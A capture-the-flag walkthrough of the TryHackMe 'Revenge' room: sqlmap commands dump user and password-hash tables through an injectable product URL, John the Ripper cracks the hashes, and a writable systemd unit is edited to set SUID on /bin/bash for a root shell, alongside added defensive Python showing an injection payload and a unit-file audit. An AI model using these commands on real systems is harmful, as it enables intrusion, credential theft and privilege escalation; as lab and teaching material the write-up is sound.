Challenge Link: https://tryhackme.com/room/revenge
Before starting the challenge, we are provided with a text file which contains some hints:
To whom it may concern, I know it was you who hacked my blog. I was really impressed with your skills. You were a little sloppy and left a bit of a footprint so I was able to track you down. But, thank you for taking me up on my offer. I've done some initial enumeration of the site because I know *some* things about hacking but not enough. For that reason, I'll let you do your own enumeration and checking. What I want you to do is simple. Break into the server that's running the website and deface the front page. I don't care how you do it, just do it. But remember...DO NOT BRING DOWN THE SITE! We don't want to cause irreparable damage. When you finish the job, you'll get the rest of your payment. We agreed upon $5,000. Half up-front and half when you finish. Good luck, Billy
The note tells us that defacing the front page of the website is part of completing the challenge (this becomes relevant in the later part of the challenge).
I started initial enumeration by running a port scan using nmap to check for open ports and services.
┌──(madhav㉿kali)-[~/ctf/thm/revenge]
└─$ nmap -sC -sV -oN nmap/initial 10.10.148.29
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-20 14:20 IST
Nmap scan report for 10.10.148.29
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 72:53:b7:7a:eb:ab:22:70:1c:f7:3c:7a:c7:76:d9:89 (RSA)
|   256 43:77:00:fb:da:42:02:58:52:12:7d:cd:4e:52:4f:c3 (ECDSA)
|_  256 2b:57:13:7c:c8:4f:1d:c2:68:67:28:3f:8e:39:30:ab (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Home | Rubber Ducky Inc.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.30 seconds
We have only two ports open. I decided to enumerate port 80 first. Let's open our web browser and see what's running on port 80.
We have a Rubber Ducky Inc website. Next I performed a directory brute-force attack using gobuster to look for hidden directories.
┌──(madhav㉿kali)-[~/ctf/thm/revenge]
└─$ gobuster dir -u http://10.10.148.29 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.148.29
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/20 14:20:42 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 8541]
/contact              (Status: 200) [Size: 6906]
/products             (Status: 200) [Size: 7254]
/login                (Status: 200) [Size: 4980]
/admin                (Status: 200) [Size: 4983]
/static               (Status: 301) [Size: 194] [--> http://10.10.148.29/static/]
===============================================================
2021/08/20 14:22:48 Finished
===============================================================
We have an /admin directory, but it was not vulnerable. Next I started testing and understanding the basic functionality of the website and found that the /products page is vulnerable to SQL injection.
When we visit the URL http://10.10.148.29/products/1', we get an error message.
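The error on a single quote is the classic sign that the path segment is being pasted straight into a SQL string. The following is an added example, not code from the room or from the Rubber Ducky Inc. site (whose backend is not shown in this write-up), that reproduces the symptom against a constructed SQLite product table and puts the fix next to it: validate the id as an integer, then bind it as a parameter. The table name, columns and sample rows are assumptions made for the example.

```python
import sqlite3
from typing import List, Optional, Tuple

# Constructed sample catalogue; the real duckyinc schema is not shown in the write-up.
SAMPLE_PRODUCTS = [
    (1, "Rubber Ducky Classic", 9.99),
    (2, "Rubber Ducky Pirate", 12.49),
    (3, "Rubber Ducky Ninja", 14.00),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory database so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, product_id: str) -> List[Tuple]:
    """The broken pattern: the URL segment is formatted directly into the query text."""
    query = f"SELECT id, name, price FROM product WHERE id = '{product_id}'"
    return conn.execute(query).fetchall()


def vulnerable_errors(conn: sqlite3.Connection, product_id: str) -> bool:
    """True when the vulnerable lookup raises a database error (what a stray quote triggers)."""
    try:
        lookup_vulnerable(conn, product_id)
        return False
    except sqlite3.OperationalError:
        return True


def lookup_safe(conn: sqlite3.Connection, product_id: str) -> Optional[Tuple]:
    """The fixed pattern: reject anything that is not an integer, then bind the value."""
    try:
        pid = int(product_id)
    except ValueError:
        return None  # "1'" or any other non-numeric id never reaches the database
    row = conn.execute(
        "SELECT id, name, price FROM product WHERE id = ?", (pid,)
    ).fetchone()
    return row


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1        ->", lookup_vulnerable(db, "1"))
    print("vulnerable, id=1'       -> error:", vulnerable_errors(db, "1'"))
    # A tautology in the id turns a one-row lookup into a full table read.
    print("vulnerable, id=1' OR '1'='1 ->", len(lookup_vulnerable(db, "1' OR '1'='1")), "rows")
    print("safe, id=1              ->", lookup_safe(db, "1"))
    print("safe, id=1'             ->", lookup_safe(db, "1'"))
```

The integer check is not a substitute for the parameter binding; both are kept because the binding prevents injection for any value, while the type check turns malformed ids into a clean 404-style response instead of a database error that leaks the stack to the client.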
To exploit this, I used a tool named sqlmap. Using sqlmap, we can exploit almost all types of SQLi in an easy way.
First I dumped all the databases using the following command:
sqlmap -u "http://10.10.148.29/products/1" --batch --dbs
We can see that there is a database named duckyinc. Next we can dump all the tables inside the database using the following command:
sqlmap -u "http://10.10.148.29/products/1" --batch -D duckyinc --tables
We have two interesting tables, user and system_user. First I dumped the contents of the user table, and there I found some user records with their hashed passwords and our first flag.
sqlmap -u "http://10.10.148.29/products/1" --batch -D duckyinc -T user --dump
Next I dumped the system_user table and found some more users and hashed passwords.
sqlmap -u "http://10.10.148.29/products/1" --batch -D duckyinc -T system_user --dump
Next I saved all password hashes in a text file and tried to brute-force them using John The Ripper.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Hurray! We found a password. We can use these credentials to login using SSH. After logging in, we can read our second flag present in the home directory of the user.
Next I used the sudo -l command to see if the user can run any command as some other user.
*********@duckyinc:~$ sudo -l
[sudo] password for *********:
Matching Defaults entries for ********* on duckyinc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ********* may run the following commands on duckyinc:
    (root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service, /bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload, sudoedit /etc/systemd/system/duckyinc.service
The user can edit duckyinc.service as root, so we can modify it to get a shell as root using the sudoedit rule shown above:
sudoedit /etc/systemd/system/duckyinc.service
This opens the unit file in the nano editor. We can modify the service into our own version which gives us a root shell: because the service is started by root, it can set the SUID bit on /bin/bash.
Next we need to reload the systemd daemon and restart the service using the following commands.
sudo systemctl daemon-reload
sudo systemctl restart duckyinc.service
Now if we check the permissions of /bin/bash, we can see that it is SUID. We can run the /bin/bash -p command and this will give us the root shell.
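The weak point here is not the sudo rule for systemctl on its own but the combination: write access to a unit file plus the right to make systemd load it as root is root-equivalent. Below is an added audit script (my own example, not from the room) that flags both halves of that combination: it parses a unit file and reports Exec* lines that set a setuid or setgid bit or run with no User= directive, and it checks a sudo rule list for the edit-then-restart pair. The unit contents are a constructed assumption (the write-up does not show the real duckyinc.service), and the rule list mirrors the sudo -l output above.

```python
import re
from typing import Dict, List, Tuple

# Constructed unit text; the real duckyinc.service is not reproduced in the write-up.
SAMPLE_UNIT = """\
[Unit]
Description=DuckyInc web application

[Service]
ExecStartPre=/bin/chmod u+s /bin/bash
ExecStart=/usr/bin/python3 /var/www/duckyinc/app.py
Restart=always

[Install]
WantedBy=multi-user.target
"""

# Rule list in the shape of the sudo -l output quoted above.
SAMPLE_SUDO_RULES = [
    "/bin/systemctl start duckyinc.service",
    "/bin/systemctl enable duckyinc.service",
    "/bin/systemctl restart duckyinc.service",
    "/bin/systemctl daemon-reload",
    "sudoedit /etc/systemd/system/duckyinc.service",
]

# chmod with a symbolic "+s" or a four-digit numeric mode whose leading digit carries setuid/setgid.
SETUID_CHMOD = re.compile(r"\bchmod\b(?:\s+\S+)*?\s+(?:[ugoa]*\+[a-z]*s\b|[2-7][0-7]{3}\b)")
EDITORS = {"sudoedit", "vi", "vim", "nano", "tee", "cp"}
APPLY = re.compile(r"\b(start|restart|reload|daemon-reload)\b")


def parse_unit(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Parse INI-style unit text into {section: [(key, value), ...]}; keys may repeat."""
    sections: Dict[str, List[Tuple[str, str]]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current].append((key.strip(), value.strip()))
    return sections


def audit_unit(text: str) -> List[str]:
    """Report Exec* lines that grant setuid/setgid bits and units that run entirely as root."""
    findings: List[str] = []
    service = parse_unit(text).get("Service", [])
    if "User" not in {k for k, _ in service}:
        findings.append("no User= directive: every Exec* line runs as root")
    for key, value in service:
        if key.startswith("Exec") and SETUID_CHMOD.search(value):
            findings.append(f"{key} sets a setuid/setgid bit: {value}")
    return findings


def audit_sudo_rules(rules: List[str], unit_name: str) -> List[str]:
    """Flag a user who may both rewrite a unit file and have systemd load it as root."""
    can_edit = [r for r in rules
                if r.split()[0].rsplit("/", 1)[-1] in EDITORS and r.endswith(unit_name)]
    can_apply = [r for r in rules if "systemctl" in r and APPLY.search(r)]
    if can_edit and can_apply:
        return [f"edit of {unit_name} ({can_edit[0]}) combined with {can_apply[0]}: "
                f"root-equivalent, restrict to an unprivileged user or drop the edit rule"]
    return []


if __name__ == "__main__":
    for f in audit_unit(SAMPLE_UNIT):
        print("UNIT:", f)
    for f in audit_sudo_rules(SAMPLE_SUDO_RULES, "duckyinc.service"):
        print("SUDO:", f)
```

On a real host the same functions can be run over /etc/systemd/system/*.service and the output of sudo -l for each account; a unit that needs a restart rule for an operator should carry a User= line so the restart cannot be turned into a root shell, and the file itself should stay root-owned and non-editable.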
But if we look, there is no root flag in the /root directory. We know from the note we got that we need to deface the front page in order to complete the challenge. So let's do it!
Now if we check the /root directory again, we will get our root flag!
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Jesse Brais.